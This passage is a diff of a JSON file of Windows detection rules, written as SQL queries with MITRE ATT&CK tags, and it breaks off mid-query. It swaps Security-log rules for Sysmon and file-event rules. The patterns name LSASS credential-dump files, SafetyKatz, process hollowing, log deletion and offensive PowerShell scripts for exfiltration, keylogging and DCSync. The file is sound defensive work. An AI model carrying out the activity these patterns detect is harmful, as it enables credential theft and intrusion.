psexec.py by triggering on specific service installation", - "author": "Bartlomiej Czyz, Relativity", + "description": "Detects when an adversary is trying to hide it's action from Sysmon logging based on error messages", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1564" ], "falsepositives": [ - "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" + "Legitimate administrative action" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4697' AND ServiceFileName REGEXP '^%systemroot%\\\\[a-zA-Z]{8}\\.exe$' AND ServiceName REGEXP '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)' AND ServiceStartType = '3' AND ServiceType = '0x10') AND NOT (ServiceName = 'PSEXESVC'))" + "SELECT * FROM logs WHERE ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' OR Description LIKE '%Failed to connect to the driver to update configuration%' ESCAPE '\\') AND NOT ((Description LIKE '%Failed to open service configuration with error%' ESCAPE '\\' AND Description LIKE '%Last error: The media is write protected.%' ESCAPE '\\') OR ((Description LIKE '%Failed to open service configuration with error 19%' ESCAPE '\\' OR Description LIKE '%Failed to open service configuration with error 93%' ESCAPE '\\'))))" ], - "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml" + "filename": "sysmon_config_modification_error.yml" }, { - "title": "Suspicious LDAP-Attributes Used", - "id": "d00a9a72-2c09-4459-ad03-5e0a23351e36", - "status": "test", - "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", - "author": "xknow @xknow_infosec", + "title": "Sysmon Blocked Executable", + "id": "23b71bc5-953e-4971-be4c-c896cda73fc2", + "status": "experimental", + "description": "Triggers on any Sysmon file block executable event. Which should indicates a violation of the block policy set", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1001.003", - "attack.command_and_control" + "attack.defense_evasion" ], "falsepositives": [ - "Companies, who may use these default LDAP-Attributes for personal information" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeValue LIKE '%' ESCAPE '\\' AND AttributeLDAPDisplayName IN ('primaryInternationalISDNNumber', 'otherFacsimileTelephoneNumber', 'primaryTelexNumber'))" + "SELECT * FROM logs WHERE EventID = '27'" ], - "filename": "win_security_susp_ldap_dataexchange.yml" + "filename": "sysmon_file_block_exe.yml" }, { - "title": "Malicious Service Installations", - "id": "cb062102-587e-4414-8efa-dbe3c7bf19c6", - "status": "test", - "description": "Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.", - "author": "Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)", + "title": "Sysmon Process Hollowing Detection", + "id": "c4b890e5-8d8c-4496-8c66-c805753817cd", + "status": "experimental", + "description": "Detects when a memory process image does not match the disk image, indicative of process hollowing.", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Sittikorn S", "tags": [ - "attack.persistence", + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1003", - "car.2013-09-005", - "attack.t1543.003", - "attack.t1569.002" + "attack.t1055.012" ], "falsepositives": [ - "Unknown" + "There are no known false positives at this time" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'javamtsup')" + "SELECT * FROM logs WHERE (Type = 'Image is replaced' AND NOT ((NewProcessName LIKE '%:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%:\\\\Program Files (x86)%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MicrosoftEdge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WMIADAP.exe' ESCAPE '\\')))" ], - "filename": "win_security_mal_service_installs.yml" + "filename": "sysmon_process_hollowing.yml" }, { - "title": "AD Object WriteDAC Access", - "id": "028c7842-4243-41cd-be6f-12f3cf1a26c7", + "title": "Sysmon Configuration Modification", + "id": "1f2b5353-573f-4880-8e33-7d04dcf97744", "status": "test", - "description": "Detects WRITE_DAC access to a domain object", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects when an attacker tries to hide from Sysmon by disabling or stopping it", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1222.001" + "attack.t1564" ], "falsepositives": [ - "Unknown" + "Legitimate administrative action" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectServer = 'DS' AND AccessMask = '0x40000' AND ObjectType IN ('19195a5b-6da0-11d0-afd3-00c04fd930c9', 'domainDNS'))" + "SELECT * FROM logs WHERE ((State = 'Stopped' OR logs MATCH ('\"Sysmon config state changed\"')) AND NOT (State = 'Started'))" ], - "filename": "win_security_ad_object_writedac_access.yml" + "filename": "sysmon_config_modification_status.yml" }, { - "title": "Suspicious Teams Application Related ObjectAcess Event", - "id": "25cde13e-8e20-4c29-b949-4e795b76f16f", + "title": "Prefetch File Deleted", + "id": "0a1f9d29-6465-4776-b091-7f43b26e4c89", "status": "experimental", - "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", - "author": "@SerkinValery", + "description": "Detects the deletion of a prefetch file which may indicate an attempt to destroy forensic evidence", + "author": "Cedric MAURUGEON", "tags": [ - "attack.credential_access", - "attack.t1528" + "attack.defense_evasion", + "attack.t1070.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4663' AND (ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR ObjectName LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\')) AND NOT (ProcessName LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows\\\\Prefetch\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.pf' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\windows\\\\system32\\\\svchost.exe' ESCAPE '\\' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "win_security_teams_suspicious_objectaccess.yml" + "filename": "file_delete_win_delete_prefetch.yml" }, { - "title": "Metasploit SMB Authentication", - "id": "72124974-a68b-4366-b990-d30e0b2a190d", - "status": "test", - "description": "Alerts on Metasploit host's authentications on the domain.", - "author": "Chakib Gzenayi (@Chak092), Hosni Mribah", + "title": "Potential PrintNightmare Exploitation Attempt", + "id": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", + "status": "experimental", + "description": "Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675", + "author": "Bhabesh Raj", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" ], "falsepositives": [ - "Linux hostnames composed of 16 characters." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID IN ('4625', '4624') AND LogonType = '3' AND AuthenticationPackageName = 'NTLM' AND WorkstationName REGEXP '^[A-Za-z0-9]{16}$') OR (ProcessName = '' AND EventID = '4776' AND Workstation REGEXP '^[A-Za-z0-9]{16}$')))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\')" ], - "filename": "win_security_metasploit_authentication.yml" + "filename": "file_delete_win_cve_2021_1675_print_nightmare.yml" }, { - "title": "Impacket PsExec Execution", - "id": "32d56ea1-417f-44ff-822b-882873f5f43b", - "status": "test", - "description": "Detects execution of Impacket's psexec.py.", - "author": "Bhabesh Raj", + "title": "Unusual File Deletion by Dns.exe", + "id": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", + "status": "experimental", + "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", + "author": "Tim Rauch (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.initial_access", + "attack.t1133" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%RemCom\\_stdin%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stdout%' ESCAPE '\\' OR RelativeTargetName LIKE '%RemCom\\_stderr%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\dns.exe' ESCAPE '\\' AND NOT (TargetFilename LIKE '%\\\\dns.log' ESCAPE '\\'))" ], - "filename": "win_security_impacket_psexec.yml" + "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml" }, { - "title": "Password Protected ZIP File Opened (Suspicious Filenames)", - "id": "54f0434b-726f-48a1-b2aa-067df14516e4", + "title": "Exchange PowerShell Cmdlet History Deleted", + "id": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ], "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Possible FP during log rotation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND (TargetName LIKE '%invoice%' ESCAPE '\\' OR TargetName LIKE '%new order%' ESCAPE '\\' OR TargetName LIKE '%rechnung%' ESCAPE '\\' OR TargetName LIKE '%factura%' ESCAPE '\\' OR TargetName LIKE '%delivery%' ESCAPE '\\' OR TargetName LIKE '%purchase%' ESCAPE '\\' OR TargetName LIKE '%order%' ESCAPE '\\' OR TargetName LIKE '%payment%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '\\\\Logging\\\\CmdletInfra\\\\LocalPowerShell\\\\Cmdlet\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\_Cmdlet\\_%' ESCAPE '\\')" ], - "filename": "win_security_susp_opened_encrypted_zip_filename.yml" + "filename": "file_delete_win_delete_exchange_powershell_logs.yml" }, { - "title": "Password Protected ZIP File Opened (Email Attachment)", - "id": "571498c8-908e-40b4-910b-d2369159a3da", + "title": "Potential Persistence Via Outlook Form", + "id": "c3edc6a5-d9d4-48d8-930e-aab518390917", "status": "experimental", - "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the creation of a new Outlook form which can contain malicious code", + "author": "Tobias Michalski (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1137.003" + ], "falsepositives": [ - "Legitimate used of encrypted ZIP files" + "Legitimate use of outlook forms" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5379' AND TargetName LIKE '%Microsoft\\_Windows\\_Shell\\_ZipFolder:filename%' ESCAPE '\\' AND TargetName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\FORMS\\\\IPM%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local Settings\\\\Application Data\\\\Microsoft\\\\Forms%' ESCAPE '\\'))" ], - "filename": "win_security_susp_opened_encrypted_zip_outlook.yml" + "filename": "file_event_win_office_outlook_newform.yml" }, { - "title": "LSASS Access from Non System Account", - "id": "962fe167-e48d-4fd6-9974-11e5b9a5d6d1", - "status": "experimental", - "description": "Detects potential mimikatz-like tools accessing LSASS from non system account", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "SafetyKatz Default Dump Filename", + "id": "e074832a-eada-4fd7-94a1-10642b130e16", + "status": "test", + "description": "Detects default lsass dump filename from SafetyKatz", + "author": "Markus Neis", "tags": [ "attack.credential_access", "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Rare legitimate files with similar filename structure" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID IN ('4663', '4656') AND AccessMask IN ('0x40', '0x1400', '0x100000', '0x1410', '0x1010', '0x1438', '0x143a', '0x1418', '0x1f0fff', '0x1f1fff', '0x1f2fff', '0x1f3fff', '40', '1400', '1000', '100000', '1410', '1010', '1438', '143a', '1418', '1f0fff', '1f1fff', '1f2fff', '1f3fff') AND ObjectType = 'Process' AND ObjectName LIKE '%\\\\lsass.exe' ESCAPE '\\') AND NOT ((SubjectUserName LIKE '%$' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Program Files%' ESCAPE '\\') OR (ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND AccessMask = '0x1410') OR (ProcessName LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\Temp\\\\debug.bin' ESCAPE '\\'" ], - "filename": "win_security_lsass_access_non_system_account.yml" + "filename": "file_event_win_hktl_safetykatz.yml" }, { - "title": "Suspicious PsExec Execution", - "id": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", - "status": "test", - "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", - "author": "Samir Bousseaden", + "title": "Suspicious Double Extension Files", + "id": "b4926b47-a9d7-434c-b3a0-adc3fa0bd13e", + "status": "experimental", + "description": "Detects dropped files with double extensions, which is often used by malware as a method to abuse the fact that windows hide default extensions by default.", + "author": "Nasreddine Bencherchali (Nextron Systems), frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1036.007" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND (RelativeTargetName LIKE '%-stdin' ESCAPE '\\' OR RelativeTargetName LIKE '%-stdout' ESCAPE '\\' OR RelativeTargetName LIKE '%-stderr' ESCAPE '\\')) AND NOT (RelativeTargetName LIKE 'PSEXESVC%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.doc.%' ESCAPE '\\' OR TargetFilename LIKE '%.docx.%' ESCAPE '\\' OR TargetFilename LIKE '%.xls.%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx.%' ESCAPE '\\' OR TargetFilename LIKE '%.ppt.%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx.%' ESCAPE '\\' OR TargetFilename LIKE '%.jpg.%' ESCAPE '\\' OR TargetFilename LIKE '%.pdf.%' ESCAPE '\\')) OR (TargetFilename LIKE '%.zip.exe' ESCAPE '\\' OR TargetFilename LIKE '%.rar.exe' ESCAPE '\\'))" ], - "filename": "win_security_susp_psexec.yml" + "filename": "file_event_win_susp_double_extension.yml" }, { - "title": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", - "id": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", + "title": "PCRE.NET Package Temp Files", + "id": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", "status": "test", - "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. Possible Rubeus tries to get a handle to LSA.", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "description": "Detects processes creating temp files related to PCRE.NET package", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4673' AND Service = 'LsaRegisterLogonProcess()' AND Keywords = '0x8010000000000000')" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\'" ], - "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" + "filename": "file_event_win_pcre_net_temp_file.yml" }, { - "title": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", - "id": "8400629e-79a9-4737-b387-5db940ab2367", - "status": "test", - "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", - "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)", + "title": "LSASS Process Memory Dump Files", + "id": "a5a2d357-1ab8-4675-a967-ef9990a59391", + "status": "experimental", + "description": "Detects file names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND TargetUserName = 'AAAAAAA')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\lsass.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsass.rar' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Temp\\\\dumpert.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Andrew.dmp' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Coredump.dmp' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass\\_2%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdump%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\lsassdmp%' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\lsass%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\') OR (TargetFilename LIKE '%SQLDmpr%' ESCAPE '\\' AND TargetFilename LIKE '%.mdmp' ESCAPE '\\') OR (TargetFilename LIKE 'nanodump%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\'))" ], - "filename": "win_security_rdp_bluekeep_poc_scanner.yml" + "filename": "file_event_win_lsass_dump.yml" }, { - "title": "CVE-2021-1675 Print Spooler Exploitation IPC Access", - "id": "8fe1c584-ee61-444b-be21-e9054b229694", - "status": "experimental", - "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", - "author": "INIT_6", + "title": "Malicious PowerShell Scripts - FileCreation", + "id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", + "status": "test", + "description": "Detects the creation of known offensive powershell scripts used for exploitation", + "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems), Mustafa Kaan Demir, Georg Lauenstein", "tags": [ "attack.execution", - "attack.t1569", - "cve.2021.1675", - "cve.2021.34527" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss' AND AccessMask = '0x3' AND ObjectType = 'File')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Add-ConstrainedDelegationBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-RemoteRegBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Add-ScrnSaveBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ADRecon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AzureADRecon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Check-VM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ConvertTo-ROT13.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Copy-VSS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Create-MultipleSessions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DNS\\_TXT\\_Pwnage.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Do-Exfiltration.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\DomainPasswordSpray.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download\\_Execute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Download-Execute-PS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enable-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Enabled-DuplicateToken.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-Command-MSSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-DNSTXT-Code.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Execute-OnTime.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ExetoText.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Exploit-Jboss.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-AVSignature.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-Fruit.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-GPOLocation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Find-TrustedDocuments.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireBuster.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\FireListener.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ApplicationHost.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ChromeDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ClipboardContents.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ComputerDetail.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-FoxDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPAutologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-GPPPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-IndexedItem.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Keystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-LSASecret.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-MicrophoneAudio.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHashes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-PassHints.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAlwaysInstallElevated.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RegAutoLogon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-RickAstley.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Screenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SecurityPackages.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceFilePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServicePermission.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-ServiceUnquoted.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-SiteListPassword.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-System.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-TimedScreenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-UnattendedInstallFile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Unconstrained.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-USBKeystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VaultCredential.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnAutoRun.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnSchTask.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebConfig.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebCredentials.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WLAN-Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Gupt-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Login.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-ServiceBinary.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-SSP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ACLScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ADSBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-AmsiBypass.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ARPScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BackdoorLNK.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BadPotato.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BetterSafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BruteForce.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Carbuncle.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Certify.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ConPtyShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialsPhish.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DAFT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DCSync.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Decode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DinvokeKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DllInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DNSUpdate.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DowngradeAccount.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EgressCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Encode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EventViewer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Eyewitness.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-FakeLogonScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Farmer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Get-RBCD-Threaded.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Gopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper2.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper3.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-HandleKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Interceptor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Internalmonologue.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-InveighRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRegsvr.ps1' ESCAPE '\\' OR TargetFilename 